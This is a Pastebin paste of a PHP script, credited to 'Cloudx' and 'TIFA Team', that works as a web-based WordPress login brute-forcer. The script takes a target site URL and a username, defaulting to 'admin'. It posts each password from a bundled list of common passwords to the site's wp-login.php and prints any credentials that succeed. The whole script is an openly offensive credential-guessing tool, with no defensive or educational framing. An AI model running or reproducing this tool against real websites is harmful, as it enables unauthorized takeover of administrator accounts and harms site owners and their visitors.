API tools faq
paste
Advertisement
jihad-x

CloudX wordpress bruter

jihad-x
Dec 26th, 2013
202
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 6.34 KB | None | 0 0
raw download clone embed print report
  1. <?php
  2.  
  3. /**
  4.  * @author Cloudx
  5.  * @copyright 2013
  6.  */
  7.  
  8. function login($url,$user,$pass){
  9.     $url = RemoveLastSlash($url);
  10.     $url = str_replace(array("http://","https://","www."),"",trim($url));
  11.             $url = "http://".$url;
  12.    $login = $url.'/wp-login.php';
  13.    $to = $url.'/wp-admin';
  14.     //$data = array('log'=>$user,'pwd'=>$pass,'rememberme'=>'forever','wp-submit'=>'?????','wp-submit'=>'????','wp-submit'=>'Log In','redirect_to','redirect_to'=>$to,'testcookie'=>1);
  15.     $ch = curl_init();
  16.     curl_setopt($ch,CURLOPT_URL,$login);
  17.     curl_setopt($ch,CURLOPT_POST,true);
  18.    // curl_setopt($ch,CURLOPT_POSTFIELDS,$data);
  19.     curl_setopt($ch,CURLOPT_POSTFIELDS,"log=".$user."&pwd=".$pass."&wp-submit=Giri?"."&wp-submit=??????"."&wp-submit=Log In?"."&redirect_to=".$to."&testcookie=1");
  20.     curl_setopt($ch,CURLOPT_RETURNTRANSFER,true);
  21.     $result = curl_exec($ch);
  22.     curl_close($ch);
  23.  
  24.     if(eregi('<div id="login_error">',$result)){
  25.         return false;
  26.     } else { return true; }
  27. }
  28. if(!isset($_GET['start'])){
  29.     echo '
  30.  
  31. <head>
  32. <meta name="keywords" content="Cloudx || WordPress Brute Forcer">
  33. <meta name="description" content="Cloudx || WordPress Brute Forcer">
  34. <title>Cloudx || WordPress Brute Forcer</title>
  35. <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
  36.    <link href="http://im35.gulfup.com/HvrEj.png" rel="SHORTCUT ICON">
  37.    <style type="text/css">
  38.    body center center p {
  39.     font-family: Arial, Helvetica, sans-serif;}
  40.    </style>
  41.    </head>
  42. <body bgcolor="#000000">
  43.  
  44. <form method="POST" action="?start">
  45.     <p align="center">
  46.     <img border="0" src="https://fbcdn-sphotos-d-a.akamaihd.net/hphotos-ak-frc1/386899_594637407227713_190411548_n.jpg" width="562" height="219"></p>
  47.     <p align="center"><font color="#FFFFFF" face="Arial Black"><b><font size="5">Wordpress</font></b></font><font size="5"><font color="#FFFFFF" face="Arial Black"><b>
  48.     Brute Forcer</b></font><font color="#FFFFFF" face="Segoe Script"> </font> </font>
  49.     <font face="Segoe Script"><b><font size="5">
  50.     <font color="#008000">&lt;</font><font color="#FFFFFF"> Cloudx </font></font>
  51.     <font size="5" color="#008000">&gt;</font></b></font></p>
  52.     <p align="center"><font color="#FFFFFF"><font face="Arial Black">~Url
  53.     :</font>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
  54.     </font>
  55.     <input type="text" name="target" size="21" value="http://www.TaRget.com"></p>
  56.     <p align="center"><font color="#FFFFFF"><font face="Arial Black">~UserName
  57.     :</font></font>&nbsp;&nbsp;
  58.     <input type="text" name="username" size="21" value="admin"></p>
  59.     <p align="center"><font face="Arial Black" color="#FFFFFF">~Pass
  60.     List :</font><font color="#FFFFFF" size="4">&nbsp;
  61.     </font> </p>
  62.     <p align="center">&nbsp;<textarea rows="5" name="password" cols="47">123123
  63. 123
  64. 1234
  65. 12345
  66. 123456
  67. 1234567
  68. 12345678
  69. 123456789
  70. 1234567890
  71. admin123
  72. admin123123
  73. 123321
  74. 55555
  75. admin
  76. administrator
  77. 123456123456
  78. admin2010
  79. admin2011
  80. password
  81. P@ssW0rd
  82. !@#$%^
  83. !@#$%^&*(
  84. (*&^%$#@!
  85. 111111
  86. 222222
  87. 333333
  88. 444444
  89. 555555
  90. 666666
  91. 777777
  92. 888888
  93. 999999
  94. password123
  95. Password123
  96. Password</textarea></p>
  97.    <p align="center"><input type="submit" value="    Brute   "></p>
  98.     <p align="center">
  99.     </font><font face="Segoe Script" size="5" color="#C0C0C0">Powerd By: TIFA Team</font><p align="center">
  100.     <font face="Courier New" size="2" color="#C0C0C0">
  101.     We Are ; &nbsp;Cloudx | CityHunter | Mr.Ghost | The Moral | Abu-3mar | Dr.Black</font></p>
  102.    <p align="center"><b><font color="#C0C0C0" face="Courier New">Greets to :</font><font color="#808000" face="Courier New"> </font>
  103.     <font color="#FFFFFF" face="Courier New">Palestine
  104.     , Syria </font></b></p>
  105.    </center>
  106.    </center>
  107.     <p align="center">
  108.    <b>
  109.    <font size="2" face="Courier New" color="#C0C0C0">
  110.    Contact :</font><font size="2" face="Courier New" color="#808000">
  111.    <a style="text-decoration: none" href="http://www.facebook.com/TIFA.TEAM">
  112.    <font color="#FFFFFF">fb.com/TIFA.TEAM</font></a></font></b></p>
  113.     <p align="center">
  114.     <embed src="http://www.youtube.com/v/bzM_slRwndM&feature=related&autoplay=1&loop=1" type="application/x-shockwave-flash" wmode="transparent" width="1" height="1"></embed>
  115.    </p>
  116.    </p>
  117. </form>
  118. ';
  119. } else {
  120.     $passwords = $_POST['password'];
  121.     $username = $_POST['username'];
  122.     $target = $_POST['target'];
  123.    
  124.     $ex = explode("\n",$passwords);
  125.     foreach($ex as $password){
  126.         if(login($target,$username,$password)){
  127.               if(!url_exists($login))
  128.          {  echo '<body bgcolor="#000000">';
  129.             echo "<p>".$url.'</font><font face="Courier New" size="5" color="#FFFFFF"> Error In Login Page Fix Url! </font><p align="center">';ob_flush();flush();break;}
  130.         echo '<body bgcolor="#000000">';
  131.         echo '<link href="http://im35.gulfup.com/HvrEj.png" rel="SHORTCUT ICON">';
  132.        
  133.         echo '</font><font face="Courier New" size="5" color="#00CC00">';
  134.         echo "Success : <br /> Target   : $target/wp-login.php <br /> Username : $username <br /> Password : $password<br /><br />";
  135.         echo '</font><font face="Segoe Script" size="5" color="#FFFFFF">Cloudx</font><p align="center">';
  136.         echo '</font><font face="Segoe Script" size="5" color="#C0C0C0">Powerd By: TIFA Team</font><p align="center">';
  137.         ob_flush();flush();break;
  138.         } else
  139.         echo '<link href="http://im35.gulfup.com/HvrEj.png" rel="SHORTCUT ICON">';
  140.         echo '<body bgcolor="#000000">';
  141.         echo '</font><font face="Courier New" size="5" color="#FF0000">';
  142.         echo "Fail : $password <br />";ob_flush();flush();
  143.            
  144.     }
  145. }
  146. function url_exists($strURL)
  147. {
  148.     $resURL = curl_init();
  149.     curl_setopt($resURL, CURLOPT_URL, $strURL);
  150.     curl_setopt($resURL, CURLOPT_BINARYTRANSFER, 1);
  151.     curl_setopt($resURL, CURLOPT_HEADERFUNCTION, 'curlHeaderCallback');
  152.     curl_setopt($resURL, CURLOPT_FAILONERROR, 1);
  153.     curl_exec ($resURL);
  154.     $intReturnCode = curl_getinfo($resURL, CURLINFO_HTTP_CODE);
  155.     curl_close ($resURL);
  156.     if ($intReturnCode != 200){return false;}
  157.     else{return true ;}
  158. }
  159. function filter($string)
  160. {
  161.     if(get_magic_quotes_gpc() != 0){return stripslashes($string);   }
  162.     else{return $string;    }
  163. }
  164. function RemoveLastSlash($url)
  165. {
  166.     if(strrpos($url, '/', -1) == strlen($url)-1)
  167.     {return substr($url,0,strrpos($url, '/', -1));}
  168.     else{return $url;}
  169. }
  170. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!